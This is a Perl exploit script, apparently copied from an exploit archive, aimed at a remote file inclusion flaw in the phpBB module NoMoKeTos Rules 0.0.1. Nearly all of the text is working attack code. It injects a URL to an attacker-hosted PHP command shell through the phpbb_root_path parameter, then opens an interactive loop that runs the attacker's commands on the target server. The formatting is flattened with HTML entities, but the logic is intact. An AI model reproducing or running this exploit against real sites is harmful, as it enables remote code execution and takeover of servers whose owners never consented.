phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit

#!/usr/bin/perl # #phpBB&nbsp;Module&nbsp;NoMoKeTos&nbsp;Rules&nbsp;0.0.1&nbsp;Remote&nbsp;File&nbsp;Include&nbsp;Exploit #&nbsp; #Coded&nbsp;by&nbsp;bd0rk&nbsp;||&nbsp;SOH-Crew # #Usage:&nbsp;exploit.pl&nbsp;[target]&nbsp;[cmd&nbsp;shell]&nbsp;[shell&nbsp;variable] # #Greetings:&nbsp;str0ke,&nbsp;TheJT,&nbsp;Kacper,&nbsp;Lu7k,&nbsp;Maik # #Vulnerable&nbsp;Code:&nbsp;include_once($phpbb_root_path&nbsp;.&nbsp;\'includes/functions_admin.\'.$phpEx); # #&nbsp;vendor:&nbsp;http://www.nomoketo.de/MODs/nomoketos_rules.zip use&nbsp;LWP::UserAgent; $Path&nbsp;=&nbsp;$ARGV[0]; $Pathtocmd&nbsp;=&nbsp;$ARGV[1]; $cmdv&nbsp;=&nbsp;$ARGV[2]; if($Path!~/http:///&nbsp;||&nbsp;$Pathtocmd!~/http:///&nbsp;||&nbsp;!$cmdv){usage()} head(); while() { &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[shell]&nbsp;$\"; while(<STDIN>) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cmd=$_; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;chomp($cmd); $xpl&nbsp;=&nbsp;LWP::UserAgent->new()&nbsp;or&nbsp;die; $req&nbsp;=&nbsp;HTTP::Request->new(GET&nbsp;=>$Path.\'includes/functions_nomoketos_rules.php?phpbb_root_path=\'.$Pathtocmd.\'?&\'.$cmdv.\'=\'.$cmd)or&nbsp;die&nbsp;\" Could&nbsp;Not&nbsp;connect \"; $res&nbsp;=&nbsp;$xpl->request($req); $return&nbsp;=&nbsp;$res->content; $return&nbsp;=~&nbsp;tr/[ ]/[....]/; if&nbsp;(!$cmd)&nbsp;{print&nbsp;\" Please&nbsp;Enter&nbsp;a&nbsp;Command \";&nbsp;$return&nbsp;=\"\";} elsif&nbsp;($return&nbsp;=~/failed&nbsp;to&nbsp;open&nbsp;stream:&nbsp;HTTP&nbsp;request&nbsp;failed!/&nbsp;||&nbsp;$return&nbsp;=~/:&nbsp;Cannot&nbsp;execute&nbsp;a&nbsp;blank&nbsp;command&nbsp;in&nbsp;<b>/) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{print&nbsp;\" Could&nbsp;Not&nbsp;Connect&nbsp;to&nbsp;cmd&nbsp;Host&nbsp;or&nbsp;Invalid&nbsp;Command&nbsp;Variable \";exit} elsif&nbsp;($return&nbsp;=~/^<br./>.<b>Fatal.error/)&nbsp;{print&nbsp;\" Invalid&nbsp;Command&nbsp;or&nbsp;No&nbsp;Return \"} if($return&nbsp;=~&nbsp;/(.*)/) { &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$finreturn&nbsp;=&nbsp;$1; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$finreturn=~&nbsp;tr/[....]/[ ]/; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\" $finreturn \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;last; } else&nbsp;{print&nbsp;\"[shell]&nbsp;$\";}}}last; sub&nbsp;head() &nbsp;{ &nbsp;print&nbsp;\" ============================================================================ \"; &nbsp;print&nbsp;\"&nbsp;*phpBB&nbsp;Module&nbsp;NoMoKeTos&nbsp;Rules&nbsp;0.0.1&nbsp;Remote&nbsp;File&nbsp;Include&nbsp;Exploit* \"; &nbsp;print&nbsp;\"============================================================================ \"; &nbsp;} sub&nbsp;usage() &nbsp;{ &nbsp;head(); &nbsp;print&nbsp;\"&nbsp;Usage:&nbsp;exploit.pl&nbsp;[target]&nbsp;[cmd&nbsp;shell&nbsp;location]&nbsp;[cmd&nbsp;shell&nbsp;variable] \"; &nbsp;print&nbsp;\"&nbsp;<Site>&nbsp;-&nbsp;Full&nbsp;path&nbsp;to&nbsp;RulesMod&nbsp;ex:&nbsp;http://www.site.com/&nbsp; \"; &nbsp;print&nbsp;\"&nbsp;<cmd&nbsp;shell>&nbsp;-&nbsp;Path&nbsp;to&nbsp;cmd&nbsp;Shell&nbsp;e.g&nbsp;http://www.different-site.com/cmd.txt&nbsp; \"; &nbsp;print&nbsp;\"&nbsp;<cmd&nbsp;variable>&nbsp;-&nbsp;Command&nbsp;variable&nbsp;used&nbsp;in&nbsp;php&nbsp;shell&nbsp; \"; &nbsp;print&nbsp;\"============================================================================ \"; &nbsp;print&nbsp;\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Bug&nbsp;Found&nbsp;by&nbsp;bd0rk&nbsp; \"; &nbsp;print&nbsp;\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;www.soh-crew.it.tt&nbsp; \"; &nbsp;print&nbsp;\"============================================================================ \"; &nbsp;exit(); &nbsp;} &nbsp;